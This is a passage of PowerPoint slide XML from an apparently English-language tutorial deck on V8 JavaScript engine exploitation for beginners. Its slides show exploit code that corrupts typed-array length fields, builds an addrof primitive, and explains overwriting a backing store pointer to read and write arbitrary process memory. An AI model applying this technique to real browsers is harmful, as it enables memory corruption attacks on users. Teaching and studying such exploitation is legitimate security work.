              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="직사각형 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A11F70AB-6D22-4B87-A481-4954145F2388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5749079" y="1326493"/>
            <a:ext cx="6051987" cy="3231654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][VERIFY_RESULT_LENGTH] -------------------------------------------------------');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr2.length: ' + tarr2.length);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr2.byteLength: ' + tarr2.byteLength);</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console.log('[+][VERIFY_RESULT_LENGTH] -------------------------------------------------------');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr3.length: ' + tarr3.length);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr3.byteLength: ' + tarr3.byteLength);</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console.log('[+][VERIFY_RESULT_LENGTH] -------------------------------------------------------');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] view.byteLength: ' + view.byteLength);</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console.log('[+][EXPLOIT_DUMP_BUFFER] ========================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        for (i = 0; i &lt; 60; i++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>            if (i == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                console.log('[+][64bit][32bit_high_byte] float_array[' + (i*2).toString() + ']: ' + float_array[i].float_to_low_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                console.log('[+][64bit][32bit_low__byte] float_array[' + (i*2+1).toString() + ']: ' + float_array[i].float_to_high_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>            else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                console.log('[+][64bit][32bit_high_byte] float_array[' + (i*2).toString() + ']: ' + float_array[i].float_to_low_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                console.log('[+][64bit][32bit_low__byte] float_array[' + (i*2+1).toString() + ']: ' + float_array[i].float_to_high_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        }</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console.log('[+][DEBUG] float_array[81]: ' + float_array[40].float_to_high_32bit().toString(16));</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console.log('[+][EXPLOIT_DUMP_BUFFER] ========================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        for (i = 0; i &lt; 100; i += 4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>            console.log('[+] view.getUint32(' + i + ', true): ' + view.getUint32(i, true).toString(16));</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return true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return false;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="직사각형 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE24B957-387B-4823-BF76-EC513B78A19C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="297306" y="5618986"/>
            <a:ext cx="11626228" cy="92333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900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do you remember "view = new DataView(tarr3.buffer);"..?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There is another thing you need to know. When creating the DataView I passed tarr3.buffer as a parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this case, the DataView object in v8 memory points to the tarr3 object, not the tarr3 buffer address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Therefore, you need to modify the buffer pointer address of the tarr3 array object. This is called a backing store pointer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Okay? Now, if you manipulate the backing store pointer address of this tarr3 object, the DataView can read and write any memory address in the process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You may insult me that It is a explanation about too easy things. However, this document is for beginners. So be patient!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="슬라이드 번호 개체 틀 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B401F0-5876-46B1-BCCA-A1DD158069DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="날짜 개체 틀 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{212A0FA8-0C60-4692-B457-592B6814D5AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6F316EFC-0610-447D-A8DC-47F71BC56BAF}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414352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8" y="866181"/>
            <a:ext cx="11773257" cy="461665"/>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sz="1200"/>
              <a:t>You can change the tarr3 array object's backing store pointer to read or write memory anywhere in the DataView.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>If so, it would be convenient to have a value somewhere in the fixed address to verify that you've changed the pointer correctly.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA497E1-B000-4529-A911-08A8FFDC8F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611943" y="129722"/>
            <a:ext cx="6933372"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Read and Write arbitrary memory with DataView</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="직사각형 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50C7A2AB-423F-4A49-99B9-95F1F6B97034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381110" y="1389401"/>
            <a:ext cx="5457154" cy="3647152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    if (float_array[2] !== undefined) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        this.exploited = true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][EXPLOIT_MEMDUMP] ============================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][BEFORE] float_array[4]: ' + float_array[4].float_to_low_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][BEFORE] float_array[4]: ' + float_array[4].float_to_high_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[3] = float_array[3].setHighUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[4] = float_array[4].setLowUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[15] = float_array[15].setHighUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[15] = float_array[15].setLowUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        // tarr3.byteLength</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[26] = float_array[26].setHighUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        // view.byteLength</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[41] = float_array[41].setHighUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        // tarr3.buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        obj_addrof['b'] = tarr3.buffer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+] addrof(45): ' + (float_array[45].float_to_high_32bit() - 1n).toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
